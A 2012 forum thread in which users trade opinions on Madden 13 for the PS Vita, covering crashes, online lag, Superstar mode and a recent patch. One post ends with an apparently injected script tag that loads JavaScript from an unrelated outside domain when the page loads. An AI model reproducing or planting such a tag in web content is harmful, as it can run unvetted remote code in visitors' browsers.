Showing results for 
Search instead for 
Do you mean 
Oct 03 2012
By: restricted2 Splicer 56 posts

Madden 13 Thoughts and Opinions

[ Edited ]
7 replies 151 views Edited Oct 3, 2012

I have had Madden 13 for the better part of 3 weeks now and I have to say I am thoroughly impressed. With all things accounted for (the fact that it is last year's game with an updated roster and commentary and the fact that it is glitchy as hell for a finished product), I still love it. I have to admit, I am a bit of a football game fanatic. I have owned at least one copy of a football game ever since they started to release a newer one every year. I even owned Tecmo Bowl and Super Tecmo Bowl the day they came out.

Now that is out, I do have some issues with it and I wonder if I am the only one. It froze on me three times at the end of the game and would not go to the loading screen when I exited the game. It hasn't really happen all that much considering the time that I have put in. But still I feel it shouldn't happen at all. Hopefully they come out with a patch to fix it but since they don't even take the time to update the rosters like everyone else gets, I have my doubts. Another gripe I have, that I hope doesn't come to be, is EA's notorious history for copy and paste for handheld games. The first PSP Madden was cool. I even bought the second one. But when the third one came out and it was still the same old garbage with nothing but a couple of tweaks I took it back and stuck with just the console version. And since FIFA has come out showing just that I am almost certain EA plans on putting next to nothing in the way of effort for the next Vita Madden.

I have read that the Vita Madden developers say that the Vita can't handle Madden 13's engine. That's total BS. Look at UGA and upcoming ACL. They are both using new high tech graphic engines. Are they trying to tell us that theirs are just too complex? That they can't use it, pull the amount of detail back, and eliminate extra background animations and detail to make it work?

All I am saying is I hope next year's Madden has dramatic improvements. At least be similar to this year's console version just toned down. The only thing that saves this year's Vita Madden in my eyes, is that it is 100 times better than all the PSP Maddens put together, bugs and all. But if next year is just another cut and paste edition then you can count me out. I am sure I am not the only one that feels this way. But if they get it right and present a football game on par with UGA or ACL graphically with minimal glitches, I will buy that game year in and year out for my Vita.

Message 1 of 8 (151 Views)
0 Likes
Fender Bender
3946 posts

Re: Madden 13 Thoughts and Opinions

Oct 3, 2012
I enjoyed the Superstar mode. I don't play online because of the lag and people disconnect all the time when.I'm blowing them out.
Message 2 of 8 (149 Views)
0 Likes
Splicer
56 posts

[ Edited ]
Oct 3, 2012

Sadly enough lag online happens. The only times I didn't experience it was playing UMVC3 and some rounds here and there playing Resistance. Have you noticed anything else annoying? And I have never played Superstar mode. That is when you pick a player, only play when they are playing, and only the position that they play. That is a neat feature. A very different way to play. I never got into it but my brother did.

Message 3 of 8 (143 Views)
0 Likes
Lombax Warrior
120 posts

Oct 4, 2012

I've resisted getting rid of it but just barely.  Continually get crashes when playing Superstar so I have to save after every game and practice so I don't lose anything.  Also have gotten the white screen safety issue when playing franchise mode.  Its fun when it works.

Message 4 of 8 (116 Views)
0 Likes
Monster Hunter
42 posts

Oct 4, 2012

i heard from another site that it has now an update....many guys says that it has been improved by the patch...definitely no lag and very small framerate drops which they say are minor and not noticeable......if you have the game you can check the update as i dont own the game yet but thinking of getting it this time cause of the update

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Message 5 of 8 (112 Views)
0 Likes
Lombax Warrior
120 posts

Oct 4, 2012
Yeh there is an update tha fixed a lot of issues but looks like it created a new one. In Superstar I can't see the post game report. Nothing comes up where i used to get the Superstar points breakdown. At least it didnt crash thougb
Message 6 of 8 (104 Views)
0 Likes
Sackboy
524 posts

Oct 4, 2012
Just glad the game is getting supported hrd it wldnt be!
Gamer till the End
Message 7 of 8 (91 Views)
0 Likes
Lombax Warrior
111 posts

Oct 4, 2012

Thats weird. Iv'e experienced the same things as other but I've had no crashes at all. I haven't tried superstar mode yet though. I have two seasons going...Lions and Ravens. I about to install the patch now and see if the lag during cinematics are fixed. And hopefully some of the commentating but not getting my hopes up on that one.

Message 8 of 8 (78 Views)
0 Likes